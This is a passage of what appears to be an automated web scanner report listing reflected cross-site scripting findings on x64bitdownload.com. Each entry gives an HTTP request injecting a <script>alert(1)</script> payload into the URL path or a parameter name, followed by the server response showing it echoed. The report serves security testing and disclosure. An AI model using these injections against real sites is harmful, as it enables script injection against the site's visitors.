Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.htmlb3c51"><script>alert(1)</script>c2a577b8281" />
...[SNIP]...

4.1522. http://www.x64bitdownload.com/64-bit-feedreader-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-feedreader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d83d"><script>alert(1)</script>0d95b09fc58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:28 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22feedreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-feedreader-downloads.html?5d83d"><script>alert(1)</script>0d95b09fc58=1" />
...[SNIP]...

4.1523. http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82621"><script>alert(1)</script>c53057f24a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-grabber-downloads.html?82621"><script>alert(1)</script>c53057f24a8=1" />
...[SNIP]...

4.1524. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-sharing-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be4af"><script>alert(1)</script>ad7bd7c1eb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:56 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94439


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.htmlbe4af"><script>alert(1)</script>ad7bd7c1eb9" />
...[SNIP]...

4.1525. http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-file-sharing-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 817d3"><script>alert(1)</script>83b84f29eb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:16 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A12%3A%22file-sharing%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A12%3A%22file+sharing%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94442


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-file-sharing-downloads.html?817d3"><script>alert(1)</script>83b84f29eb9=1" />
...[SNIP]...

4.1526. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20c23"><script>alert(1)</script>323d5f8b558 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html20c23"><script>alert(1)</script>323d5f8b558" />
...[SNIP]...

4.1527. http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63229"><script>alert(1)</script>158ae792632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33945


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-c-44-newsgroup-clients-downloads.html?63229"><script>alert(1)</script>158ae792632=1" />
...[SNIP]...

4.1528. http://www.x64bitdownload.com/64-bit-forum-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forum-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34dd1"><script>alert(1)</script>b828f5462c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:41 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22forum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91047


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forum-downloads.html?34dd1"><script>alert(1)</script>b828f5462c6=1" />
...[SNIP]...

4.1529. http://www.x64bitdownload.com/64-bit-forums-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forums-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21a7c"><script>alert(1)</script>2d7fe0d2eb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:00:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87218


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forums-downloads.html21a7c"><script>alert(1)</script>2d7fe0d2eb0" />
...[SNIP]...

4.1530. http://www.x64bitdownload.com/64-bit-forums-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-forums-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eaef"><script>alert(1)</script>f7180ec1d07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:37 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22forums%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-forums-downloads.html?8eaef"><script>alert(1)</script>f7180ec1d07=1" />
...[SNIP]...

4.1531. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-grabber-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0d91"><script>alert(1)</script>fc86d6334b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:17 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98832


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-grabber-downloads.htmle0d91"><script>alert(1)</script>fc86d6334b" />
...[SNIP]...

4.1532. http://www.x64bitdownload.com/64-bit-grabber-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-grabber-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ac7"><script>alert(1)</script>733f69cdf35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-grabber-downloads.html?86ac7"><script>alert(1)</script>733f69cdf35=1" />
...[SNIP]...

4.1533. http://www.x64bitdownload.com/64-bit-group-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-group-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d17"><script>alert(1)</script>831c8190191 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:18 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-group-downloads.htmld5d17"><script>alert(1)</script>831c8190191" />
...[SNIP]...

4.1534. http://www.x64bitdownload.com/64-bit-group-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-group-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d774c"><script>alert(1)</script>b7a347567e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:55 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22group%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-group-downloads.html?d774c"><script>alert(1)</script>b7a347567e5=1" />
...[SNIP]...

4.1535. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-highspeed-connection-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6e64"><script>alert(1)</script>c521abd2a7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:16 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-highspeed-connection-downloads.htmlf6e64"><script>alert(1)</script>c521abd2a7a" />
...[SNIP]...

4.1536. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-highspeed-connection-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79657"><script>alert(1)</script>383139ca774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-highspeed-connection-downloads.html?79657"><script>alert(1)</script>383139ca774=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:59:00 GMT
Cache-Control: max-age=600
Pragma: cache
